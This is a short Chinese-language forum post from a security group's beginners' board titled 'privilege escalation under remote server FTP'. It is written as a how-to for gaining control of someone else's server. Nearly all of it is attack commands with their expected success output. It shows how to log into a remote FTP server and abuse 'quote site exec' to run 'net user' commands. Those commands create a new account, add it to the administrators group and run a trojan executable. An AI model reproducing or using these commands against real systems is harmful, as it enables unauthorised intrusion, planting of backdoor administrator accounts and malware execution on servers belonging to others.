论坛: 菜鸟乐园 标题: 远程服务器FTP下提权 复制本贴地址    
作者: Winmillion [winmillion]    论坛用户   登录
登陆远程FTP:
open www.xxx.com
提示:230 User logged in,Proceed
表示登陆成功!

输入:
cd c:\
cd windows
cd system32

添加系统管理员:
quote site exec "net user Winmillion 123456 /add"
提示:200 EXEC command successful
表示成功!

提权:
quote site exec "net localgroup administrators Winmillion /add"
提示:200 EXEC command successful
表示成功!

或者执行木马:
quote site exec c:\muma.exe

(200为执行成功!)


地主 发表时间: 09-03-09 18:42

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号